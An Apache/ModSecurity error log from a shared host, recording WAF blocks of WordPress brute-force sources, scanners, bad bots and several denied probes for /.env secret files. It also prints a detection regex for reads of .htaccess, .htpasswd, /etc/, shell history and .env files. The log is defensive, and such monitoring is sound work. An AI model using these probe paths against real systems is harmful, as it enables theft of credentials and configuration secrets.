[Tue May 26 13:23:37.244407 2026] [security2:error] [pid 512745:tid 512891] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRgHKSB_s2CvZg7xNVTwAAARo"]
[Tue May 26 13:23:38.049333 2026] [security2:error] [pid 512745:tid 512968] [client 176.65.139.237:30254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "pgcsi.org.in"] [uri "/.env"] [unique_id "ahVRgnKSB_s2CvZg7xNVZQAAAWc"]
[Tue May 26 13:23:39.444293 2026] [security2:error] [pid 512745:tid 512936] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRg3KSB_s2CvZg7xNVfAAAAUc"]
[Tue May 26 13:23:41.331086 2026] [security2:error] [pid 512344:tid 512504] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRhMbElyei4S77DQfu9gAAAB4"]
[Tue May 26 13:23:42.569489 2026] [security2:error] [pid 512745:tid 512912] [client 3.85.126.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.moes-art.com"] [uri "/index.php"] [unique_id "ahVRhXKSB_s2CvZg7xNVtgAAAS8"]
[Tue May 26 13:23:43.572845 2026] [security2:error] [pid 512745:tid 512989] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRh3KSB_s2CvZg7xNVzQAAAXw"]
[Tue May 26 13:23:45.600389 2026] [security2:error] [pid 512745:tid 512941] [client 40.77.167.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVRiHKSB_s2CvZg7xNV9wABTH0"]
[Tue May 26 13:23:45.990426 2026] [security2:error] [pid 512745:tid 512924] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRiXKSB_s2CvZg7xNWXAAAATs"]
[Tue May 26 13:23:49.087979 2026] [security2:error] [pid 512745:tid 512987] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRjHKSB_s2CvZg7xNWlAAAAXo"]
[Tue May 26 13:23:49.961772 2026] [security2:error] [pid 512745:tid 512784] [remote 178.104.164.71:39624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVRjXKSB_s2CvZg7xNWsQABLiY"]
[Tue May 26 13:23:50.185997 2026] [security2:error] [pid 512745:tid 512883] [client 14.234.67.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRjXKSB_s2CvZg7xNWrQAAARI"]
[Tue May 26 13:23:51.124105 2026] [security2:error] [pid 512344:tid 512574] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRjsbElyei4S77DQfvnwAAAGQ"]
[Tue May 26 13:23:51.782311 2026] [proxy:error] [pid 512745:tid 512831] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:23:51.782362 2026] [proxy_http:error] [pid 512745:tid 512831] [remote 35.94.96.83:42758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:23:51.782972 2026] [proxy:error] [pid 512745:tid 512831] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:23:51.783010 2026] [proxy_http:error] [pid 512745:tid 512831] [remote 35.94.96.83:42758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:23:51.873706 2026] [proxy:error] [pid 512745:tid 512872] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:23:51.873778 2026] [proxy_http:error] [pid 512745:tid 512872] [remote 35.94.96.83:42758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:23:51.874330 2026] [proxy:error] [pid 512745:tid 512872] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:23:51.874362 2026] [proxy_http:error] [pid 512745:tid 512872] [remote 35.94.96.83:42758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:23:53.588167 2026] [security2:error] [pid 512745:tid 512933] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRkXKSB_s2CvZg7xNW6AAAAUQ"]
[Tue May 26 13:23:54.915804 2026] [security2:error] [pid 512344:tid 512464] [remote 95.216.117.13:37796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVRksbElyei4S77DQfv9AAAbnc"]
[Tue May 26 13:23:55.406651 2026] [security2:error] [pid 512745:tid 512937] [client 208.91.198.85:29092] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.jhonweb.com"] [uri "/wp-cron.php"] [unique_id "ahVRk3KSB_s2CvZg7xNXCAAAAUg"]
[Tue May 26 13:23:55.412242 2026] [security2:error] [pid 512344:tid 512586] [client 66.249.66.9:39346] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahVRksbElyei4S77DQfv9gAAAHA"]
[Tue May 26 13:23:55.902460 2026] [security2:error] [pid 512745:tid 512940] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRk3KSB_s2CvZg7xNXCwAAAUs"]
[Tue May 26 13:23:57.077704 2026] [security2:error] [pid 512344:tid 512538] [client 66.249.66.169:63506] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahVRlMbElyei4S77DQfwEAAAAEA"]
[Tue May 26 13:23:57.786633 2026] [security2:error] [pid 512344:tid 512567] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRlcbElyei4S77DQfwGQAAAF0"]
[Tue May 26 13:23:58.270914 2026] [security2:error] [pid 512344:tid 512496] [client 167.172.81.117:60395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "alpha-bau.net"] [uri "/license.txt"] [unique_id "ahVRlsbElyei4S77DQfwKAAAABY"]
[Tue May 26 13:23:58.583109 2026] [security2:error] [pid 512745:tid 512950] [client 74.7.175.173:51282] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.pstta.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVRlnKSB_s2CvZg7xNXSwABVXE"]
[Tue May 26 13:23:59.037072 2026] [security2:error] [pid 512745:tid 512751] [remote 167.71.130.119:34028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVRlnKSB_s2CvZg7xNXVAABTAU"]
[Tue May 26 13:24:00.569684 2026] [security2:error] [pid 512745:tid 512885] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRmHKSB_s2CvZg7xNXdgAAARQ"]
[Tue May 26 13:24:02.933691 2026] [security2:error] [pid 512344:tid 512378] [remote 216.73.216.251:30240] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVRmcbElyei4S77DQfwYAAAEiE"]
[Tue May 26 13:24:03.158890 2026] [security2:error] [pid 512745:tid 512941] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRmnKSB_s2CvZg7xNXxQAAAUw"]
[Tue May 26 13:24:05.450018 2026] [security2:error] [pid 512745:tid 512988] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRnXKSB_s2CvZg7xNX6gAAAXs"]
[Tue May 26 13:24:07.550063 2026] [security2:error] [pid 512344:tid 512523] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRn8bElyei4S77DQfwrAAAADE"]
[Tue May 26 13:24:08.852515 2026] [autoindex:error] [pid 512745:tid 512880] [client 43.134.36.238:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:24:09.247887 2026] [security2:error] [pid 512745:tid 512863] [remote 74.7.241.58:39548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVRoXKSB_s2CvZg7xNYMQABNXU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:24:09.735238 2026] [security2:error] [pid 512745:tid 512978] [client 195.80.150.132:57759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVRoXKSB_s2CvZg7xNYLwAAAXE"], referer: https://www.cagmedya.com/dijital-donusumde-web-sitesi-tasariminin-rolu/
[Tue May 26 13:24:09.819458 2026] [security2:error] [pid 512344:tid 512596] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRocbElyei4S77DQfwzwAAAHo"]
[Tue May 26 13:24:11.191434 2026] [security2:error] [pid 512745:tid 512822] [remote 216.73.217.110:5621] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahVRo3KSB_s2CvZg7xNYUAABaEw"]
[Tue May 26 13:24:11.908085 2026] [security2:error] [pid 512344:tid 512436] [remote 103.230.156.120:45466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVRo8bElyei4S77DQfw-wAAZ1s"]
[Tue May 26 13:24:12.318532 2026] [security2:error] [pid 512745:tid 512825] [remote 109.228.50.118:52224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVRpHKSB_s2CvZg7xNYWQABTE8"]
[Tue May 26 13:24:12.638827 2026] [security2:error] [pid 512745:tid 512940] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRpHKSB_s2CvZg7xNYWgAAAUs"]
[Tue May 26 13:24:14.737060 2026] [security2:error] [pid 512344:tid 512523] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRpsbElyei4S77DQfxPwAAADE"]
[Tue May 26 13:24:16.490542 2026] [security2:error] [pid 512344:tid 512541] [client 14.173.115.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRqMbElyei4S77DQfxZwAAAEM"]
[Tue May 26 13:24:16.844902 2026] [security2:error] [pid 512745:tid 512936] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRqHKSB_s2CvZg7xNYbQAAAUc"]
[Tue May 26 13:24:19.269684 2026] [security2:error] [pid 512344:tid 512534] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRqsbElyei4S77DQfxkgAAADw"]
[Tue May 26 13:24:19.904482 2026] [security2:error] [pid 512344:tid 512474] [client 185.191.171.6:62804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahVRq8bElyei4S77DQfxngAAAAA"]
[Tue May 26 13:24:19.904682 2026] [security2:error] [pid 512344:tid 512474] [client 185.191.171.6:62804] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahVRq8bElyei4S77DQfxngAAAAA"]
[Tue May 26 13:24:21.550390 2026] [security2:error] [pid 512344:tid 512529] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRrcbElyei4S77DQfxsgAAADc"]
[Tue May 26 13:24:24.076107 2026] [security2:error] [pid 512745:tid 512913] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRr3KSB_s2CvZg7xNYuQAAATA"]
[Tue May 26 13:24:25.801559 2026] [security2:error] [pid 512344:tid 512524] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRscbElyei4S77DQfx8AAAADI"]
[Tue May 26 13:24:28.874574 2026] [security2:error] [pid 512745:tid 512918] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRtHKSB_s2CvZg7xNY-wAAATU"]
[Tue May 26 13:24:30.501016 2026] [security2:error] [pid 512344:tid 512532] [client 68.183.190.139:59483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVRtsbElyei4S77DQfyTQAAADo"]
[Tue May 26 13:24:31.118968 2026] [security2:error] [pid 512745:tid 512955] [client 68.183.190.139:59525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVRt3KSB_s2CvZg7xNZDAAAAVo"]
[Tue May 26 13:24:31.361578 2026] [security2:error] [pid 512745:tid 512973] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRtnKSB_s2CvZg7xNZCwAAAWw"]
[Tue May 26 13:24:33.130789 2026] [core:crit] [pid 512745:tid 512888] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:24:33.462850 2026] [core:crit] [pid 512745:tid 512877] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:24:33.469353 2026] [security2:error] [pid 512745:tid 512995] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRuXKSB_s2CvZg7xNZKgAAAYI"]
[Tue May 26 13:24:35.121105 2026] [security2:error] [pid 512745:tid 512999] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRunKSB_s2CvZg7xNZSwAAAYY"]
[Tue May 26 13:24:37.655172 2026] [security2:error] [pid 512745:tid 512994] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRvXKSB_s2CvZg7xNZZgAAAYE"]
[Tue May 26 13:24:38.709730 2026] [core:crit] [pid 512745:tid 512905] (13)Permission denied: [client 40.77.167.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:24:40.056807 2026] [fcgid:warn] [pid 512745:tid 512885] (70014)End of file found: [client 5.101.64.6:60023] mod_fcgid: can't get data from http client
[Tue May 26 13:24:40.111115 2026] [security2:error] [pid 512745:tid 513002] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRv3KSB_s2CvZg7xNZhwAAAYk"]
[Tue May 26 13:24:40.405399 2026] [security2:error] [pid 512344:tid 512500] [client 208.84.100.173:50934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/.env"] [unique_id "ahVRwMbElyei4S77DQfy3AAAABo"]
[Tue May 26 13:24:40.814354 2026] [security2:error] [pid 512344:tid 512479] [client 208.84.100.173:50934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/app/.env"] [unique_id "ahVRwMbElyei4S77DQfy5AAAAAU"]
[Tue May 26 13:24:40.891778 2026] [security2:error] [pid 512745:tid 512987] [client 208.84.100.173:51034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/backend/.env"] [unique_id "ahVRwHKSB_s2CvZg7xNZoQAAAXo"]
[Tue May 26 13:24:41.922959 2026] [security2:error] [pid 512745:tid 512875] [client 208.84.100.173:51018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.user-helps.info.md-74.webhostbox.net"] [uri "/api/.env"] [unique_id "ahVRwXKSB_s2CvZg7xNZrwAAAQo"]
[Tue May 26 13:24:42.245160 2026] [security2:error] [pid 512344:tid 512594] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVRwcbElyei4S77DQfy9gAAAHg"]
[Tue May 26 13:24:42.531604 2026] [security2:error] [pid 512344:tid 512397] [remote 68.183.43.38:38712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.43.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVRwsbElyei4S77DQfzAQAASzQ"]
